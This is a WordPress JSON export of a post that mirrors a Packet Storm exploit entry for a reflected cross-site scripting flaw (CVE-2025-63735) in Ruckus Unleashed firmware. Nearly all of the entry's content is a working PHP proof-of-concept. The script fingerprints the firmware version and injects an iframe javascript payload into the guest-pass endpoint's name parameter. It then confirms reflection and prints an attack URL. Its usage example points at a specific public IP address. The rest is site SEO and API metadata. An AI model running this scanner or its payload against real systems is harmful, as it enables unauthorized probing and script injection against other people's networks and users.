{"id":41410,"date":"2026-02-18T12:49:58","date_gmt":"2026-02-18T12:49:58","guid":{"rendered":"http:\/\/localhost\/?p=41410"},"modified":"2026-02-18T12:49:58","modified_gmt":"2026-02-18T12:49:58","slug":"ruckus-unleashed-2001361319-xss-scanner","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=41410","title":{"rendered":"\ud83d\udcc4 Ruckus Unleashed 200.13.6.1.319 XSS Scanner_PACKETSTORM:215813"},"content":{"rendered":"

{“lastseen”:”2026-02-18T17:34:29″,”description”:”This is a testing script to validate whether or not a Ruckus Unleashed system is vulnerable to the cross site scripting vulnerability in version 200.13.6.1.319…”,”published”:”2026-02-18T00:00:00″,”modified”:”2026-02-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Ruckus Unleashed 200.13.6.1.319 XSS Scanner”,”source”:””,”references”:””,”id”:”PACKETSTORM:215813″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-63735″],”sourceData”:”=============================================================================================================================================\\n | # Title : Ruckus Unleashed 200.13.6.1.319 External Scanner |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.ruckusnetworks.com\/ |\\n =============================================================================================================================================\\n \\n [+] Summary \\n \\n This release introduces a remote security scanner capable of detecting vulnerable Ruckus Unleashed systems over LAN or WAN using external IP addresses.\\n \\n [+] The scanner performs:\\n \\n Version Enumeration\\n \\n Endpoint Exposure Check\\n \\n Reflected XSS Detection for CVE\u20112025\u201163735\\n \\n Captive Portal Validation\\n \\n Full Signature\u2011Based Audit\\n \\n The tool was built to identify Ruckus controllers exposed to the internet and automatically verify whether the system reflects unsanitized input in the name parameter.\\n \\n [+] poc\\n usage : php poc.php –target 41.110.27.120\\n \\n \\n \\u003c?php\\n \\n \\n function http_get($url) {\\n $ch = curl_init();\\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $url,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_FOLLOWLOCATION =\\u003e true,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n CURLOPT_TIMEOUT =\\u003e 10\\n ]);\\n $result = curl_exec($ch);\\n curl_close($ch);\\n return $result;\\n }\\n \\n $target = $argv[1] ?? null;\\n if(!$target){\\n die(\\”Usage: php scanner.php \\u003ctarget\\u003e\\\\n\\”);\\n }\\n \\n echo \\”[+] Target: $target\\\\n\\”;\\n \\n $base = \\”https:\/\/$target\/selfguestpass\/guestAccessSubmit.jsp\\”;\\n $test = \\”$base?cookie=null\\u0026tip=5\\u0026name=test123\\”;\\n \\n echo \\”[+] Checking endpoint…\\\\n\\”;\\n $resp = http_get($test);\\n \\n if(!$resp){\\n die(\\”[!] No response from target.\\\\n\\”);\\n }\\n \\n echo \\”[+] Endpoint accessible.\\\\n\\”;\\n \\n echo \\”[+] Extracting version…\\\\n\\”;\\n preg_match(‘\/([0-9]{3}\\\\.[0-9]+\\\\.[0-9]+\\\\.[0-9]+)\/’, $resp, $m);\\n $version = $m[1] ?? \\”Unknown\\”;\\n \\n echo \\”[+] Firmware: $version\\\\n\\”;\\n \\n if($version === \\”200.13.6.1.319\\”){\\n echo \\”[!] Version is vulnerable.\\\\n\\”;\\n }\\n \\n echo \\”[+] Sending XSS payload…\\\\n\\”;\\n \\n $payload = urlencode(‘\\u003c\/p\\u003e\\u003cform\\u003e\\u003ciframe src=javascript:alert(`xss`)\\u003e’);\\n $url = \\”$base?cookie=null\\u0026tip=5\\u0026name=$payload\\”;\\n \\n $resp2 = http_get($url);\\n \\n if(strpos($resp2, ‘\\u003c\/p\\u003e\\u003cform\\u003e\\u003ciframe’) !== false){\\n echo \\”[!] REFLECTED XSS CONFIRMED (CVE-2025-63735)\\\\n\\”;\\n echo \\”[+] PoC URL:\\\\n$url\\\\n\\”;\\n } else {\\n echo \\”[+] Not vulnerable.\\\\n\\”;\\n }\\n ?\\u003e\\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215813″,”cvss”:{“score”:6.1,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:R\/S:C\/C:L\/I:L\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215813\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-18T17:34:29″,”description”:”This is a testing script to validate whether or not a Ruckus Unleashed system is vulnerable to the cross site scripting vulnerability in version 200.13.6.1.319…”,”published”:”2026-02-18T00:00:00″,”modified”:”2026-02-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,31,12,21,13,53,7,11,5],"class_list":["post-41410","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-61","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Ruckus Unleashed 200.13.6.1.319 XSS Scanner_PACKETSTORM:215813 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=41410\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Ruckus Unleashed 200.13.6.1.319 XSS Scanner_PACKETSTORM:215813 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-18T17:34:29″,”description”:”This is a testing script to validate whether or not a Ruckus Unleashed system is vulnerable to the cross site scripting vulnerability in version 200.13.6.1.319…”,”published”:”2026-02-18T00:00:00″,”modified”:”2026-02-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=41410\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-18T12:49:58+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41410#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41410\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Ruckus Unleashed 200.13.6.1.319 XSS Scanner_PACKETSTORM:215813\",\"datePublished\":\"2026-02-18T12:49:58+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41410\"},\"wordCount\":554,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-6.1\",\"exploit\",\"MEDIUM\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41410#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41410\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41410\",\"name\":\"\ud83d\udcc4 Ruckus Unleashed 200.13.6.1.319 XSS Scanner_PACKETSTORM:215813 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-18T12:49:58+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41410#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41410\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41410#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Ruckus Unleashed 200.13.6.1.319 XSS Scanner_PACKETSTORM:215813\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Ruckus Unleashed 200.13.6.1.319 XSS Scanner_PACKETSTORM:215813 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=41410","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Ruckus Unleashed 200.13.6.1.319 XSS Scanner_PACKETSTORM:215813 - zero redgem","og_description":"{“lastseen”:”2026-02-18T17:34:29″,”description”:”This is a testing script to validate whether or not a Ruckus Unleashed system is vulnerable to the cross site scripting vulnerability in version 200.13.6.1.319…”,”published”:”2026-02-18T00:00:00″,”modified”:”2026-02-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4...","og_url":"https:\/\/zero.redgem.net\/?p=41410","og_site_name":"zero redgem","article_published_time":"2026-02-18T12:49:58+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=41410#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=41410"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Ruckus Unleashed 200.13.6.1.319 XSS Scanner_PACKETSTORM:215813","datePublished":"2026-02-18T12:49:58+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=41410"},"wordCount":554,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-6.1","exploit","MEDIUM","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=41410#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=41410","url":"https:\/\/zero.redgem.net\/?p=41410","name":"\ud83d\udcc4 Ruckus Unleashed 200.13.6.1.319 XSS Scanner_PACKETSTORM:215813 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-18T12:49:58+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=41410#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=41410"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=41410#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Ruckus Unleashed 200.13.6.1.319 XSS Scanner_PACKETSTORM:215813"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41410","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=41410"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41410\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=41410"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=41410"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=41410"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}